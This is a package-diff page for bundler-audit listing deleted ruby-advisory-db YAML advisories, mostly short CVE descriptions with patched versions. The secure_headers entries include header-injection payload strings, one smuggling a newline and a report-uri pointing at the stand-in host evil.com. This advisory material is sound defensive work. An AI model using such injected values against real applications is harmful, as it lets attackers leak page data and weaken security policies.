RubyGems - bundler-audit - Versions diffs - 0.7.0.1 → 0.9.1 - Mend

bundler-audit 0.7.0.1 → 0.9.1

Files changed (613) hide show

data/data/ruby-advisory-db/gems/rubygems-update/CVE-2017-0903.yml DELETED Viewed

@@ -1,17 +0,0 @@
----
-gem: rubygems-update
-library: rubygems
-cve: 2017-0903
-url: https://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html
-title: Unsafe Object Deserialization Vulnerability in RubyGems
-date: 2017-10-09
-description: |
-  There is a possible unsafe object deserialization vulnerability in RubyGems.
-  It is possible for YAML deserialization of gem specifications to bypass class
-  white lists. Specially crafted serialized objects can possibly be used to
-  escalate to remote code execution.
-cvss_v2: 7.5
-unaffected_versions:
-  - "< 2.0.0"
-patched_versions:
-  - ">= 2.6.14"

data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8320.yml DELETED Viewed

@@ -1,21 +0,0 @@
----
-gem: rubygems-update
-library: rubygems
-cve: 2019-8320
-url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-title: Delete directory using symlink when decompressing tar
-date: 2019-03-05
-description: |
-  A Directory Traversal issue was discovered in RubyGems 2.7.6 and later
-  through 3.0.2. Before making new directories or touching files (which now
-  include path-checking code for symlinks), it would delete the target
-  destination. If that destination was hidden behind a symlink, a malicious gem
-  could delete arbitrary files on the user’s machine, presuming the attacker
-  could guess at paths. Given how frequently gem is run as sudo, and how
-  predictable paths are on modern systems (/tmp, /usr, etc.), this could
-  likely lead to data loss or an unusable system.
-unaffected_versions:
-  - "< 2.7.6"
-patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"

data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8321.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: rubygems-update
-library: rubygems
-cve: 2019-8321
-url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-title: Escape sequence injection vulnerability in verbose
-date: 2019-03-05
-description: |
-  An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
-  Gem::UserInteraction#verbose calls say without escaping, escape sequence
-  injection is possible.
-unaffected_versions:
-  - "< 2.6"
-patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"

data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8322.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: rubygems-update
-library: rubygems
-cve: 2019-8322
-url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-title: Escape sequence injection vulnerability in gem owner
-date: 2019-03-05
-description: |
-  An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem
-  owner command outputs the contents of the API response directly to stdout.
-  Therefore, if the response is crafted, escape sequence injection may occur.
-unaffected_versions:
-  - "< 2.6"
-patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"

data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8323.yml DELETED Viewed

@@ -1,17 +0,0 @@
----
-gem: rubygems-update
-library: rubygems
-cve: 2019-8323
-url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-title: Escape sequence injection vulnerability in api response handling
-date: 2019-03-05
-description: |
-  An issue was discovered in RubyGems 2.6 and later through 3.0.2.
-  Gem::GemcutterUtilities#with_response may output the API response to stdout
-  as it is. Therefore, if the API side modifies the response, escape sequence
-  injection may occur.
-unaffected_versions:
-  - "< 2.6"
-patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"

data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8324.yml DELETED Viewed

@@ -1,18 +0,0 @@
----
-gem: rubygems-update
-library: rubygems
-cve: 2019-8324
-url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-title: Installing a malicious gem may lead to arbitrary code execution
-date: 2019-03-05
-description: |
-  An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted
-  gem with a multi-line name is not handled correctly. Therefore, an attacker
-  could inject arbitrary code to the stub line of gemspec, which is eval-ed by
-  code in ensure_loadable_spec during the preinstall check.
-unaffected_versions:
-  - "< 2.6"
-patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"

data/data/ruby-advisory-db/gems/rubygems-update/CVE-2019-8325.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: rubygems-update
-library: rubygems
-cve: 2019-8325
-url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-title: Escape sequence injection vulnerability in errors
-date: 2019-03-05
-description: |
-  An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
-  Gem::CommandManager#run calls alert_error without escaping, escape sequence
-  injection is possible. (There are many ways to cause an error.)
-unaffected_versions:
-  - "< 2.6"
-patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"

data/data/ruby-advisory-db/gems/rubyzip/CVE-2017-5946.yml DELETED Viewed

@@ -1,17 +0,0 @@
----
-gem: rubyzip
-cve: 2017-5946
-url: https://github.com/rubyzip/rubyzip/issues/315
-title: Directory traversal vulnerability in rubyzip
-date: 2017-02-27
-description: |
-  The Zip::File component in the rubyzip gem before 1.2.1 for Ruby has a
-  directory traversal vulnerability. If a site allows uploading of .zip files,
-  an attacker can upload a malicious file that uses "../" pathname substrings to
-  write arbitrary files to the filesystem.
-cvss_v2: 7.5
-cvss_v3: 9.8
-patched_versions:
-  - ">= 1.2.1"

data/data/ruby-advisory-db/gems/rubyzip/CVE-2018-1000544.yml DELETED Viewed

@@ -1,19 +0,0 @@
----
-gem: rubyzip
-date: 2018-06-14
-url: https://github.com/rubyzip/rubyzip/issues/369
-cve: 2018-1000544
-title: Directory Traversal in rubyzip
-description: |
-  rubyzip version 1.2.1 and earlier contains a Directory Traversal vulnerability
-  in Zip::File component that can result in write arbitrary files to the filesystem.
-  If a site allows uploading of .zip files, an attacker can upload a malicious file
-  which contains symlinks or files with absolute pathnames "../" to write arbitrary
-  files to the filesystem.
-patched_versions:
-  - ">= 1.2.2"
-related:
-  cve:
-    - 2017-5946
-  url:
-    - https://security-tracker.debian.org/tracker/CVE-2018-1000544

data/data/ruby-advisory-db/gems/rubyzip/CVE-2019-16892.yml DELETED Viewed

@@ -1,13 +0,0 @@
----
-gem: rubyzip
-cve: 2019-16892
-url: https://github.com/rubyzip/rubyzip/pull/403
-date: 2019-09-12
-title: Denial of Service in rubyzip ("zip bombs")
-description: |
-  In Rubyzip before 1.3.0, a crafted ZIP file can bypass application
-  checks on ZIP entry sizes because data about the uncompressed size
-  can be spoofed. This allows attackers to cause a denial of service
-  (disk consumption).
-patched_versions:
-  - ">= 1.3.0"

data/data/ruby-advisory-db/gems/safemode/CVE-2016-3693.yml DELETED Viewed

@@ -1,13 +0,0 @@
----
-gem: safemode
-cve: 2016-3693
-title: Safemode Gem for Ruby is vulnerable to information disclosure
-date: 2016-04-20
-url: http://seclists.org/oss-sec/2016/q2/119
-description: |
-  Safemode is initialised with an optional 'delegate' object.
-  If the delegated object is a Rails controller, 'inspect' could
-  be called which then exposes all informations about the App,
-  including routes, secret tokens, caches and so on.
-patched_versions:
-  - ">= 1.2.4"

data/data/ruby-advisory-db/gems/safemode/CVE-2017-7540.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: safemode
-cve: 2017-7540
-title: Safemode Gem for Ruby is vulnerable to bypassing safe mode limitations
-date: 2017-04-05
-url: https://nvd.nist.gov/vuln/detail/CVE-2017-7540
-description: |
-  Safemode, as used in Foreman, versions 1.3.2 and earlier are vulnerable
-  to bypassing safe mode limitations via special Ruby syntax. This can
-  lead to deletion of objects for which the user does not have delete
-  permissions or possibly to privilege escalation.
-patched_versions:
-  - ">= 1.3.3"
-related:
-  url:
-    - https://github.com/svenfuchs/safemode/pull/23

data/data/ruby-advisory-db/gems/samlr/CVE-2018-20857.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: samlr
-cve: 2018-20857
-ghsa: qpxp-5j56-gg3x
-url: https://github.com/zendesk/samlr/pull/29
-date: 2019-07-31
-title: samlr XML nodes comment attack
-description: |
-  Zendesk Samlr before 2.6.2 allows an XML nodes comment attack such as
-  a name_id node with user@example.com followed by <!---->. and then the attacker's
-  domain name.
-cvss_v3: 7.5
-patched_versions:
-- ">= 2.6.2"

data/data/ruby-advisory-db/gems/sanitize/CVE-2018-3740.yml DELETED Viewed

@@ -1,22 +0,0 @@
----
-gem: sanitize
-cve: 2018-3740
-date: 2018-03-19
-url: https://github.com/rgrove/sanitize/issues/176
-title: HTML injection/XSS in Sanitize
-description: |
-  When Sanitize gem is used in combination with libxml2 >= 2.9.2,
-  a specially crafted HTML fragment can cause libxml2 to generate
-  improperly escaped output, allowing non-whitelisted attributes to be
-  used on whitelisted elements.
-  This can allow HTML and JavaScript injection, which could result in XSS
-  if Sanitize's output is served to browsers.
-unaffected_versions:
-  - "< 1.1.0"
-patched_versions:
-  - "~> 2.1.1"
-  - ">= 4.6.3"
-related:
-  url:
-    - https://github.com/rgrove/sanitize/commit/01629a162e448a83d901456d0ba8b65f3b03d46e

data/data/ruby-advisory-db/gems/screen_capture/OSVDB-107783.yml DELETED Viewed

@@ -1,7 +0,0 @@
----
-gem: screen_capture
-osvdb: 107783
-url: http://osvdb.org/show/osvdb/107783
-title: Screen Capture Gem for Ruby screen_capture.rb URL Handling Arbitrary Command Execution
-date: 2014-06-07
-description: Screen Capture Gem for Ruby contains a flaw in screen_capture.rb that is triggered when handling input passed via the URL. This may allow a context-dependent attacker to execute arbitrary commands.

data/data/ruby-advisory-db/gems/secure_headers/CVE-2020-5216.yml DELETED Viewed

@@ -1,52 +0,0 @@
----
-gem: secure_headers
-cve: 2020-5216
-ghsa: w978-rmpf-qmwg
-url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
-date: 2020-01-23
-title: secure_headers header injection due to newline
-description: |-
-  If user-supplied input was passed into append/override_content_security_policy_directives,
-  a newline could be injected leading to limited header injection.
-  Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy
-  header with the remaining value of the original string. It will continue to create new headers
-  for each newline.
-  e.g.
-  ```
-  override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
-  ```
-  would result in
-  ```
-  Content-Security-Policy: ... script-src: mycdn.com
-  Content-Security-Policy: injected
-  Content-Security-Policy: rest-of-the-header
-  ```
-  CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
-  ```
-  override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
-  ```
-  ```
-  Content-Security-Policy: ... script-src: mycdn.com
-  Content-Security-Policy: default-src 'none'; report-uri evil.com
-  Content-Security-Policy: rest-of-the-header
-  ```
-  Workarounds
-  ```
-  override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
-  ```
-cvss_v3: 4.4
-patched_versions:
-  - "~> 3.9"
-  - "~> 5.2"
-  - ">= 6.3.0"

data/data/ruby-advisory-db/gems/secure_headers/CVE-2020-5217.yml DELETED Viewed

@@ -1,42 +0,0 @@
----
-gem: secure_headers
-cve: 2020-5217
-ghsa: xq52-rv6w-397c
-url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
-date: 2020-01-23
-title: secure_headers directive injection using semicolon
-description: |-
-  If user-supplied input was passed into append/override_content_security_policy_directives,
-  a semicolon could be injected leading to directive injection.
-  This could be used to e.g. override a script-src directive. Duplicate directives are ignored
-  and the first one wins. The directives in secure_headers are sorted alphabetically so they
-  pretty much all come before script-src. A previously undefined directive would receive a value
-  even if SecureHeaders::OPT_OUT was supplied.
-  The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning
-  when this happens. This will result in innocuous browser console messages if being
-  exploited/accidentally used. In future releases, we will raise application errors resulting in
-  500s.
-  > Duplicate script-src directives detected. All but the first instance will be ignored.
-  See https://www.w3.org/TR/CSP3/#parse-serialized-policy
-  > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was
-  > ignored. A console warning might be appropriate, for example.
-  # Workarounds
-  If you are passing user input into the above methods, you could filter out the input:
-  ```
-  override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")])
-  ```
-cvss_v3: 4.4
-patched_versions:
-  - "~> 3.8"
-  - "~> 5.1"
-  - ">= 6.2.0"

data/data/ruby-advisory-db/gems/sentry-raven/CVE-2014-9490.yml DELETED Viewed

@@ -1,14 +0,0 @@
----
-gem: sentry-raven
-cve: 2014-9490
-osvdb: 115654
-url: https://nvd.nist.gov/vuln/detail/CVE-2014-9490
-title: sentry-raven Gem for Ruby contains a flaw that can result in a denial of service
-date: 2014-12-08
-description: Sentry raven-ruby contains a flaw in the lib/raven/okjson.rb script
-  that is triggered when large numeric values are stored as an exponent or in
-  scientific notation. With a specially crafted request, an attacker can cause
-  the software to consume excessive resources resulting in a denial of service.
-cvss_v2: 5.0
-patched_versions:
-  - ">= 0.12.2"

data/data/ruby-advisory-db/gems/sfpagent/CVE-2014-2888.yml DELETED Viewed

@@ -1,15 +0,0 @@
----
-gem: sfpagent
-cve: 2014-2888
-osvdb: 105971
-url: https://nvd.nist.gov/vuln/detail/CVE-2014-2888
-title: sfpagent Gem for Ruby JSON[body] Module Name Remote Command Execution
-date: 2014-04-16
-description: |
-  sfpagent Gem for Ruby contains a flaw that is triggered as JSON[body]
-  input is not properly sanitized when handling module names with shell
-  metacharacters. This may allow a context-dependent attacker to execute
-  arbitrary commands.
-cvss_v2: 7.5
-patched_versions:
-  - ">= 0.4.15"

data/data/ruby-advisory-db/gems/show_in_browser/CVE-2013-2105.yml DELETED Viewed

@@ -1,8 +0,0 @@
----
-gem: show_in_browser
-cve: 2013-2105
-osvdb: 93490
-url: https://nvd.nist.gov/vuln/detail/CVE-2013-2105
-title: Show In Browser Gem for Ruby /tmp/browser.html Arbitrary Script Injection
-date: 2013-05-17
-description: Show In Browser Gem for Ruby contains a flaw that is triggered when the application does not validate input passed via the /tmp/browser.html file. This may allow a local attacker to create a specially crafted request that would execute arbitrary script code in a user's browser.

data/data/ruby-advisory-db/gems/sidekiq/OSVDB-125675.yml DELETED Viewed

@@ -1,9 +0,0 @@
----
-gem: sidekiq
-osvdb: 125675
-url: https://github.com/mperham/sidekiq/pull/2422
-title: Sidekiq Gem for Ruby Multiple Unspecified CSRF
-date: 2015-07-06
-description: Sidekiq::Web lacks CSRF protection
-patched_versions:
-  - ">= 3.4.2"

data/data/ruby-advisory-db/gems/sidekiq/OSVDB-125676.yml DELETED Viewed

@@ -1,14 +0,0 @@
----
-gem: sidekiq
-osvdb: 125676
-url: https://github.com/mperham/sidekiq/issues/2330
-title: |
-  Sidekiq Gem for Ruby web/views/queue.erb CurrentMessagesInQueue Element
-  Reflected XSS
-date: 2015-06-04
-description: XSS via queue name in Sidekiq::Web
-patched_versions:
-  - ">= 3.4.0"
-related:
-  osvdb:
-    - 125677

data/data/ruby-advisory-db/gems/sidekiq/OSVDB-125678.yml DELETED Viewed

@@ -1,9 +0,0 @@
----
-gem: sidekiq
-osvdb: 125678
-url: https://github.com/mperham/sidekiq/pull/2309
-title: Sidekiq Gem for Ruby web/views/queue.erb msg.display_class Element XSS
-date: 2015-04-21
-description: XSS via job arguments display class in Sidekiq::Web
-patched_versions:
-  - ">= 3.4.0"

data/data/ruby-advisory-db/gems/sidekiq-pro/OSVDB-126329.yml DELETED Viewed

@@ -1,12 +0,0 @@
----
-gem: sidekiq-pro
-osvdb: 126329
-url: https://github.com/mperham/sidekiq/commit/a695ff347ae50f641dfc35189131b232ea0aa1db
-title: |
-  Sidekiq Pro Gem for Ruby web/views/batch.erb Class and ErrorMessage Elements
-  Reflected XSS
-date: 2015-05-11
-description: |
-  XSS via batch failure error_class and error_message in Sidekiq::Web
-patched_versions:
-  - ">= 2.0.2"

data/data/ruby-advisory-db/gems/sidekiq-pro/OSVDB-126330.yml DELETED Viewed

@@ -1,10 +0,0 @@
----
-gem: sidekiq-pro
-osvdb: 126330
-url: https://github.com/mperham/sidekiq/commit/99b12fb50fe244c5a317f03f1bed9b333ec56ebe
-title: |
-  Sidekiq Pro Gem for Ruby web/views/batch{,es}.erb Description Element XSS
-date: 2014-10-13
-description: XSS via batch description in Sidekiq::Web
-patched_versions:
-  - ">= 1.9.1"

data/data/ruby-advisory-db/gems/sidekiq-pro/OSVDB-126331.yml DELETED Viewed

@@ -1,14 +0,0 @@
----
-gem: sidekiq-pro
-osvdb: 126331
-url: https://github.com/mperham/sidekiq/commit/651400ed8f237118346895c99dc28ca94f3169d3
-title: Sidekiq Pro Gem for Ruby CSRF in Job Filtering
-date: 2015-07-17
-description: |
-  Sidekiq::Web job filtering lacks CSRF protection. This issue
-  is related to OSVDB-125675.
-patched_versions:
-  - ">= 2.0.6"
-related:
-  osvdb:
-    - 125675

data/data/ruby-advisory-db/gems/simple_captcha2/CVE-2019-14282.yml DELETED Viewed

@@ -1,13 +0,0 @@
----
-gem: simple_captcha2
-cve: 2019-14282
-url: https://github.com/rubygems/rubygems.org/issues/2073
-date: 2019-07-31
-title: Code backdoor in simple_captcha2
-description: |
-  The simple_captcha2 gem 0.2.3 for Ruby, as distributed on RubyGems.org,
-  included a code-execution backdoor inserted by a third party.
-unaffected_versions:
-  - "< 0.2.3"
-  - "> 0.2.3"
-cvss_v3: 9.8

data/data/ruby-advisory-db/gems/simple_form/CVE-2019-16676.yml DELETED Viewed

@@ -1,15 +0,0 @@
----
-gem: simple_form
-cve: 2019-16676
-ghsa: r74q-gxcg-73hx
-url: https://github.com/plataformatec/simple_form/security/advisories/GHSA-r74q-gxcg-73hx
-title: simple_form Gem for Ruby Incorrect Access Control for forms based on user input
-date: 2019-09-27
-description: |
-  Simple Form before 5.0 has Incorrect Access Control in `file_method?` in `lib/simple_form/form_builder.rb`,
-  because a user-supplied string is invoked as a method call.
-  This only happens for pages that build forms based on user input.
-patched_versions:
-  - ">= 5.0"

data/data/ruby-advisory-db/gems/sinatra/CVE-2018-11627.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: sinatra
-cve: 2018-11627
-url: https://github.com/sinatra/sinatra/issues/1428
-title: XSS via the 400 Bad Request page
-date: 2018-05-31
-description: |
-  Sinatra before 2.0.2 has XSS via the 400 Bad Request page that occurs upon a params parser exception.
-cvss_v3: 6.1
-patched_versions:
-  - ">= 2.0.2"
-unaffected_versions:
-  - "< 2.0.0.beta1"
-  - "2.0.0-alpha"

data/data/ruby-advisory-db/gems/sinatra/CVE-2018-7212.yml DELETED Viewed

@@ -1,19 +0,0 @@
----
-gem: sinatra
-cve: 2018-7212
-url: https://github.com/sinatra/sinatra/pull/1379
-date: 2018-01-09
-title: sinatra ruby gem path traversal via backslash characters on Windows
-description: |
-  An issue was discovered in rack-protection/lib/rack/protection/path_traversal.rb
-  in Sinatra 2.x before 2.0.1 on Windows. Path traversal is possible via backslash
-  characters.
-cvss_v3: 5.3
-cvss_v2: 5.0
-patched_versions:
-  - ">= 2.0.1"
-unaffected_versions:
-  - "< 2.0.0"

data/data/ruby-advisory-db/gems/slanger/CVE-2019-1010306.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: slanger
-cve: 2019-1010306
-ghsa: rg32-m3hf-772v
-url: https://github.com/stevegraham/slanger/pull/238
-date: 2019-07-16
-title: Arbitrary command execution in slanger
-description: |
-  A remote attacker can execute arbitrary commands by sending a crafted request to the server.
-  This is due to the use of `Oj.load` instead of `Oj.strict_load` when processing messages.
-  Note that `slanger` is no longer maintained.
-patched_versions:
-  - ">= 0.6.1"
-cvss_v3: 9.8

data/data/ruby-advisory-db/gems/smart_proxy_dynflow/CVE-2018-14643.yml DELETED Viewed

@@ -1,18 +0,0 @@
----
-gem: smart_proxy_dynflow
-cve: 2018-14643
-url: https://github.com/theforeman/smart_proxy_dynflow/pull/54
-date: 2018-09-14
-title: smart_proxy_dynflow gem authentication bypass in Foreman remote execution feature
-description: |
-  An authentication bypass flaw was found in the smart_proxy_dynflow component
-  used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary
-  commands on machines managed by vulnerable Foreman instances, in a highly privileged
-  context.
-cvss_v3: 9.8
-cvss_v2: 10.0
-patched_versions:
-  - ~> 0.1.11
-  - ">= 0.2.1"

data/data/ruby-advisory-db/gems/sorcery/CVE-2020-11052.yml DELETED Viewed

@@ -1,27 +0,0 @@
----
-gem: sorcery
-cve: 2020-11052
-ghsa: jc8m-cxhj-668x
-url: https://github.com/Sorcery/sorcery/security/advisories/GHSA-jc8m-cxhj-668x
-date: 2020-05-07
-title: Improper Restriction of Excessive Authentication Attempts in Sorcery
-description: |-
-  ### Impact
-  Brute force vulnerability when using password authentication via Sorcery.
-  The brute force protection submodule will prevent a brute force attack for
-  the defined lockout period, but once expired protection will not be re-enabled
-  until a user or malicious actor logs in successfully. This does not affect users
-  that do not use the built-in brute force protection submodule, nor users that use
-  permanent account lockout.
-  ### Patches
-  Patched as of version `0.15.0`.
-  ### Workarounds
-  Currently no workarounds, other than monkey patching the authenticate method
-  provided by Sorcery or upgrading to version `0.15.0`.
-cvss_v3: 8.3
-patched_versions:
-  - ">= 0.15.0"

data/data/ruby-advisory-db/gems/sounder/CVE-2013-5647.yml DELETED Viewed

@@ -1,14 +0,0 @@
----
-gem: sounder
-cve: 2013-5647
-osvdb: 96278
-url: https://nvd.nist.gov/vuln/detail/CVE-2013-5647
-title: Sounder Gem for Ruby File Name Handling Arbitrary Command Execution
-date: 2013-08-14
-description: |
-  Sounder Gem for Ruby contains a flaw that is triggered during the handling
-  of file names. This may allow a context-dependent attacker to execute
-  arbitrary commands.
-cvss_v2: 7.5
-patched_versions:
-  - ">= 1.0.2"

data/data/ruby-advisory-db/gems/spina/CVE-2015-4619.yml DELETED Viewed

@@ -1,16 +0,0 @@
----
-gem: spina
-cve: 2015-4619
-title: Cross-site request forgery (CSRF) vulnerability in Spina gem
-date: 2015-06-16
-url: http://www.openwall.com/lists/oss-security/2015/06/16/11
-description: >-
-  `Spina::ApplicationController` actions didn't have CSRF
-  protection. This causes a CSRF vulnerability across the
-  entire engine which includes administrative functionality
-  such as creating users, changing passwords,
-  and media management.
-patched_versions:
-  - ">= 0.6.29"